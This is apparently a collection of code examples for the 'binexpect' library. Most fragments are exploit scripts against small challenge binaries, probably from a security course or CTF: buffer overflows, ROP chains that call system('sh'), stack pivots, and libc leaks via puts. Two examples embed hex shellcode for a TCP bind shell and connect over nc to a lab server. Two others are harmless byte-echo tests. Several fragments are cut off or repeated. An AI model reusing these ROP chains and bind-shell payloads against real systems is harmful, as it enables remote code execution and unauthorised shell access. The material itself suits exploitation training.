Example #1
    payload += struct.pack('L', base - 0x40)
    payload += struct.pack('L', 0x400630)       # read to pivot
    target.sendbin(payload)
    target.sendeof()
    target.tryexpect("If you're cool you'll get a shell.\n")

    payload = b'S' * 0x20
    payload += struct.pack('L', base)
    payload += struct.pack('L', 0x400630)       # read to get control back
    target.sendbin(payload)
    target.sendeof()
    target.tryexpect("If you're cool you'll get a shell.\n")

if __name__ == "__main__":

    setup = binexpect.setup('./s7')
    target = setup.target()
    target.setecho(False)

    # STAGE 1
    payload = b'A' * 0x20
    payload += struct.pack('L', base - 0x40)    # new stack frame
    payload += struct.pack('L', 0x400630)       # read
                                                # pivot through main's leave; ret
    target.tryexpect("What is your password\?\n")
    target.sendbin(payload)
    target.sendeof()
    target.tryexpect("If you're cool you'll get a shell.\n")

    payload = b'B' * 0x20
    payload += struct.pack('L', base)           # value for rbp
Example #2
    clear_line("[x] Testing single bytes in context.\n")

    for x in range(256):
        do_test(target, (61, x, 61))

    clear_line("[x] Testing multiple bytes in context.\n")

    for x in range(256):
        for y in range(256):
            do_test(target, (61, x, y, 61))

    clear_line()


if __name__ == '__main__':

    import binexpect

    # Drive a plain `cat` child through binexpect so run_tests() (defined
    # above) can push tuples of byte values through it. `os` is assumed to
    # be imported earlier in the file -- it is not visible here.
    setup = binexpect.setup("cat")
    target = setup.target()
    target.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

    # Hide the terminal cursor while progress lines are rewritten in place;
    # the finally clause restores it even if a test raises. The exit status
    # of `setterm` is not checked, so a missing binary only prints a shell
    # error and the tests still run.
    try:
        os.system('setterm -cursor off')
        run_tests(target)
    finally:
        os.system('setterm -cursor on')

    print("[-] Tests done.")
Example #3
import binascii
import json
import struct
import sys
import time

import binexpect


def rop(*args):
    """Pack every integer in *args* as a native-order 64-bit unsigned value and concatenate them.

    Returns an empty bytes object when called with no arguments.
    """
    words = [struct.pack('Q', value) for value in args]
    return b''.join(words)



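target_host = "localhost"  # "attack.samsclass.info"
target_port = "10100"  # "13010"

# Talk to the server through an interactive `nc` child driven by binexpect.
setup = binexpect.setup("nc " + target_host + " " + target_port)
s7 = setup.target()
s7.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

# Raw string: `\(` and `\)` are regex escapes for tryexpect, not Python
# string escapes. In a plain string they are invalid escape sequences
# (SyntaxWarning on Python 3.12+); `\n` still matches a newline as a regex.
s7.tryexpect(r"Welcome to the p13x Server! buffer = (.*)\nEnter string \(q to quit\)")
# The captured group is bytes; decode it before parsing the hex text.
buf_addr = int(str(s7.match.group(1), 'utf-8'), 16)
print("BUF ADDR: " + hex(buf_addr))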

def get_shellcode(port):

    # simple tcp bind shell, ripped from: http://shell-storm.org/shellcode/files/shellcode-858.php
    
    hexcode = "6a025f6a015e6a065a6a29580f054989c04d31d241524152c604240266c7442402PORT4889e641505f6a105a6a31580f0541505f6a015e6a32580f054889e66a104889e241505f6a2b580f054889c76a035e48ffce6a21580f0575f64831f64831d248bf2f2f62696e2f736848c1ef0857545f6a3b580f05"
    # render the port to BIG endian

    hexport = str(binascii.hexlify(bytearray([ (port >> 8) & 0xff, port & 0xff])), 'utf-8')
Example #4
import struct
import binascii
import time
import sys
import json
import binexpect


def rop(*args):
    """Pack every integer in *args* as a native-order 64-bit unsigned value and concatenate them.

    Returns an empty bytes object when called with no arguments.
    """
    words = [struct.pack('Q', value) for value in args]
    return b''.join(words)


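target_host = "localhost"  # "attack.samsclass.info"
target_port = "10100"  # "13010"

# Talk to the server through an interactive `nc` child driven by binexpect.
setup = binexpect.setup("nc " + target_host + " " + target_port)
s7 = setup.target()
s7.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

# Raw string: `\(` and `\)` are regex escapes for tryexpect, not Python
# string escapes. In a plain string they are invalid escape sequences
# (SyntaxWarning on Python 3.12+); `\n` still matches a newline as a regex.
s7.tryexpect(
    r"Welcome to the p13x Server! buffer = (.*)\nEnter string \(q to quit\)")
# The captured group is bytes; decode it before parsing the hex text.
buf_addr = int(str(s7.match.group(1), 'utf-8'), 16)
print("BUF ADDR: " + hex(buf_addr))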


def get_shellcode(port):

    # simple tcp bind shell, ripped from: http://shell-storm.org/shellcode/files/shellcode-858.php

    hexcode = "6a025f6a015e6a065a6a29580f054989c04d31d241524152c604240266c7442402PORT4889e641505f6a105a6a31580f0541505f6a015e6a32580f054889e66a104889e241505f6a2b580f054889c76a035e48ffce6a21580f0575f64831f64831d248bf2f2f62696e2f736848c1ef0857545f6a3b580f05"
    # render the port to BIG endian
Example #5
#!/usr/bin/env python

import binexpect
import struct

if __name__ == "__main__":

    # Spawn the local './s3' test binary under binexpect and script its two prompts.
    setup = binexpect.setup('./s3')
    target = setup.target()
    target.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

    # First prompt: an 8-byte, NUL-padded "sh".
    stage1 = b'sh'.ljust(8, b'\x00')
    target.tryexpect('What is your name?')
    target.sendbinline(stage1)
    
    # Second prompt: 0x30 filler bytes, 8 literal bytes, then three values
    # packed with native 'L' -- an 8-byte unsigned long on LP64 Linux but
    # 4 bytes on Windows/32-bit, so the layout is not portable.
    payload = b'A' * 0x30
    payload += b'paddingp' #rbp
    payload += struct.pack('L', 0x4007e3) # pop rdi; ret
    payload += struct.pack('L', 0x6010a0) # pop'd
    payload += struct.pack('L', 0x400772) # system()

    target.tryexpect('What is your password?')
    target.sendbinline(payload)

    # Wait for the binary's closing banner; pwned() presumably hands the
    # session over interactively -- confirm in binexpect.
    target.tryexpect("If you're cool you'll get a shell.")
    target.pwned()

Example #6
#!/usr/bin/env python

import binexpect
import struct

if __name__ == "__main__":

    # Spawn the local './s4' test binary under binexpect and script its two prompts.
    setup = binexpect.setup('./s4')
    target = setup.target()
    target.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

    # First prompt: 0x3d8 filler bytes, three values packed with native 'L'
    # (8-byte unsigned long on LP64 Linux, 4 bytes elsewhere -- not
    # portable), then an 8-byte NUL-padded "sh".
    # setting future stack on the bss
    stage1 = b'A' * 0x3d8 # padding
    stage1 += struct.pack('L', 0x4007e3) # pop rdi; ret
    stage1 += struct.pack('L', 0x601490) # pop'd
    stage1 += struct.pack('L', 0x400772) # system
    stage1 += b'sh'.ljust(8, b'\x00')    # "sh"
    target.tryexpect('What is your name?')
    target.sendbinline(stage1)

    # Second prompt: 0x30 filler bytes followed by two packed values.
    # trigger stack pivot
    payload = b'A' * 0x30
    payload += struct.pack('L', 0x601470) # bss + 0x3d8 bytes
    payload += struct.pack('L', 0x40077c) # leave; ret (pivot)

    target.tryexpect('What is your password?')
    target.sendbinline(payload)

    # Wait for the binary's closing banner; pwned() presumably hands the
    # session over interactively -- confirm in binexpect.
    target.tryexpect("If you're cool you'll get a shell.")
    target.pwned()
Example #7
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import binexpect
import struct

if __name__ == "__main__":
    # Spawn the local './s5' test binary under binexpect.
    setup = binexpect.setup('./s5')
    target = setup.target()
    target.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

    base = 0x601500 # new stack base

    # First message: 32 filler bytes followed by two values packed with
    # native 'L' (8-byte unsigned long on LP64 Linux, 4 bytes elsewhere --
    # not portable).
    payload = b'A' * 32
    payload += struct.pack('L', base)           # new stack base
    payload += struct.pack('L', 0x400670)       # read(0, rbp-0x20, 0x400); [...];leave; ret
                                                # pivot here from main
    target.tryexpect('What is your password?')
    target.sendbinline(payload)

    # Second message, sent without waiting for another prompt: 32 filler
    # bytes, 8 literal bytes, three packed values, then an 8-byte
    # NUL-padded "sh".
    payload = b'A' * 32
    payload += b'BBBBBBBB'                      # rbp

    payload += struct.pack('L', 0x400743)       # pop rdi; ret
    payload += struct.pack('L', base+0x20)      # @'sh'
    payload += struct.pack('L', 0x4006c7)       # system()

    payload += b'sh'.ljust(8, b'\x00')          # 'sh'
    target.sendbinline(payload)

    # Wait for the binary's closing banner; nothing is sent afterwards.
    target.tryexpect("If you're cool you'll get a shell.")
Example #8
import binexpect
import struct

# 0x4006d1 : leave; ret
# 0x400743 : pop rdi; ret
# 0x400670 : read(0, rbp-0x20, 0x400); [...];leave; ret
# 0x400686 : read(); [...]; leave; ret
# 0x4006c7 : system()

# 0x600ff8 : .got /!\
# 0x601000 : .got.plt /!\
# 0x601050 : .data
# 0x601060 : .bss

if __name__ == "__main__":
    setup = binexpect.setup('./s6')
    target = setup.target()
    target.setecho(False)

    base = 0x601520 # stack

    # STAGE1:
    # pivot stack with call to read
    payload = b'A' * 0x20
    payload += struct.pack('L', base - 0x30)    # new stack base
    payload += struct.pack('L', 0x400670)       # read(0, rbp-0x20, 0x30); [...];leave; ret
                                                # pivot here from main.
    target.tryexpect('What is your password?')
    target.sendbin(payload)

    # STAGE2:
Example #9
    def get(self, symbol):
        """Return the value stored for *symbol* in self.libc_map, or None when absent."""
        # Guard-clause form of the membership test; the lookup itself is unchanged.
        if symbol not in self.libc_map:
            return None
        return self.libc_map[symbol]


def rop(*args):
    """Pack every integer in *args* as a native-order 64-bit unsigned value and concatenate them.

    Returns an empty bytes object when called with no arguments.
    """
    words = [struct.pack('Q', value) for value in args]
    return b''.join(words)



# Symbol table instance; its get() method is visible above, the rest of
# LibcMap is defined earlier in the file.
libc_map = LibcMap()

# Spawn the local './s7' binary under binexpect and consume its two banners.
setup = binexpect.setup("./s7")
s7 = setup.target()
s7.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

s7.tryexpect("Welcome Stranger")
# NOTE(review): tryexpect patterns appear to be regexes (other scripts on
# this page escape `\?` and read s7.match), so the unescaped `?` here makes
# the trailing 'd' optional instead of matching a literal '?' -- confirm.
s7.tryexpect("What is your password?")

def leak(address):
    payload = bytes('A' * 32, 'utf-8')

    payload += rop(
        0x42424242, # frame pointer
        0x00400703, # pop rdi; ret;
        address,    # leak
        0x004004c0, # puts@plt
        
Example #10
        do_test(target, (x,))

    clear_line("[x] Testing single bytes in context.\n")

    for x in range(256):
        do_test(target, (61, x, 61))

    clear_line("[x] Testing multiple bytes in context.\n")

    for x in range(256):
        for y in range(256):
            do_test(target, (61, x, y, 61))

    clear_line()

if __name__ == '__main__':

    import binexpect

    # Drive a plain `cat` child through binexpect so run_tests() (defined
    # above) can push tuples of byte values through it. `os` is assumed to
    # be imported earlier in the file -- it is not visible here.
    setup = binexpect.setup("cat")
    target = setup.target()
    target.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

    # Hide the terminal cursor while progress lines are rewritten in place;
    # the finally clause restores it even if a test raises. The exit status
    # of `setterm` is not checked, so a missing binary only prints a shell
    # error and the tests still run.
    try:
        os.system('setterm -cursor off')
        run_tests(target)
    finally:
        os.system('setterm -cursor on')

    print("[-] Tests done.")
Example #11
    def get(self, symbol):
        """Return the value stored for *symbol* in self.libc_map, or None when absent."""
        # Guard-clause form of the membership test; the lookup itself is unchanged.
        if symbol not in self.libc_map:
            return None
        return self.libc_map[symbol]


def rop(*args):
    """Pack every integer in *args* as a native-order 64-bit unsigned value and concatenate them.

    Returns an empty bytes object when called with no arguments.
    """
    words = [struct.pack('Q', value) for value in args]
    return b''.join(words)



# Symbol table instance; its get() method is visible above, the rest of
# LibcMap is defined earlier in the file.
libc_map = LibcMap()

# Spawn the local './s8' binary under binexpect and consume its two banners.
setup = binexpect.setup("./s8")
s8 = setup.target()
s8.setecho(False)  # presumably disables pty echo like pexpect's setecho -- confirm

s8.tryexpect("Welcome Stranger")
# `\?` is a regex escape for a literal '?'; in a non-raw string it is also an
# invalid Python escape (SyntaxWarning on 3.12+), so a raw string is safer.
s8.tryexpect("What is your password\?")

def leak(address):
    payload = bytes('A' * 32, 'utf-8')

    payload += rop(
        0x00601800, # frame pointer
        0x00400630, # read@main
        )    

    s8.sendbin(payload)